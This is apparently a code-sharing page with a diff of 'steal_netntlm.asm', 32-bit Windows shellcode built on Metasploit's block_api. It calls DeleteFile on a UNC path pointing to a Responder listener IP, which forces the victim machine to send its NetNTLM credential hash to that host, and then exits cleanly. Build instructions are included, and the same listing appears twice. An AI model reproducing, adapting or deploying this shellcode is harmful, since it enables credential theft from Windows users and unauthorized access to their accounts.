EgeBalci · June 26, 2019 18:06
diff --git a/steal_netntlm.asm b/steal_netntlm.asm
 ;-----------------------------------------------------------------------------;
 ; Author: Ege Balcı (egebalci[at]pm[dot]me)
 ; Compatible: All Windows versions with SMBv2/v1
 ; Version: 1.0 (26 June 2019)
 ; Size: 185 bytes + strlen(IP) + 1
 ; Build: nasm -f bin steal_netntlm.asm -o shellcode && xxd -i shellcode
 ;-----------------------------------------------------------------------------;

 [BITS 32]
 [ORG 0]

 	cld                           ; Clear the direction flag.
 	call start                    ; Call start, this pushes the address of 'api_call' onto the stack.
 	%include "block_api.asm"      ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm
 start:                            ;
 	pop ebp                       ; Pop off the address of 'api_call' for calling later.
 	call get_ip                   ; Get IP string address to stack
 	db "\\1.1.1.1\x",0            ; Responder IP address
 get_ip:                           ;
 	push 0x13DD2ED7               ; hash( "kernel32.dll", "DeleteFile" )
 	call ebp                      ; DeleteFile("\\1.1.1.1\x");
 exitfunk:                         ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_exitfunk.asm
 	mov ebx, 0x0A2A1DE0           ; The EXITFUNK as specified by user...
 	push 0x9DBD95A6               ; hash( "kernel32.dll", "GetVersion" )
 	call ebp                      ; GetVersion(); (AL will = major version and AH will = minor version)
 	cmp al, byte 6                ; If we are not running on Windows Vista, 2008 or 7
 	jl short goodbye              ; Then just call the exit function...
 	cmp bl, 0xE0                  ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
 	jne short goodbye             ;
 	mov ebx, 0x6F721347           ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
 goodbye:                          ; We now perform the actual call to the exit function
 	push byte 0                   ; push the exit function parameter
 	push ebx                      ; push the hash of the exit function
 	call ebp                      ; call EXITFUNK( 0 );
	;-----------------------------------------------------------------------------;
	; Author: Ege Balcı (egebalci[at]pm[dot]me)
	; Compatible: All Windows versions with SMBv2/v1
	; Version: 1.0 (26 June 2019)
	; Size: 185 bytes + strlen(IP) + 1
	; Build: nasm -f bin steal_netntlm.asm -o shellcode && xxd -i shellcode
	;-----------------------------------------------------------------------------;

	[BITS 32]
	[ORG 0]

	cld ; Clear the direction flag.
	call start ; Call start, this pushes the address of 'api_call' onto the stack.
	%include "block_api.asm" ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm
	start: ;
	pop ebp ; Pop off the address of 'api_call' for calling later.
	call get_ip ; Get IP string address to stack
	db "\\1.1.1.1\x",0 ; Responder IP address
	get_ip: ;
	push 0x13DD2ED7 ; hash( "kernel32.dll", "DeleteFile" )
	call ebp ; DeleteFile("\\1.1.1.1\x");
	exitfunk: ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_exitfunk.asm
	mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
	push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
	call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
	cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
	jl short goodbye ; Then just call the exit function...
	cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
	jne short goodbye ;
	mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
	goodbye: ; We now perform the actual call to the exit function
	push byte 0 ; push the exit function parameter
	push ebx ; push the hash of the exit function
	call ebp ; call EXITFUNK( 0 );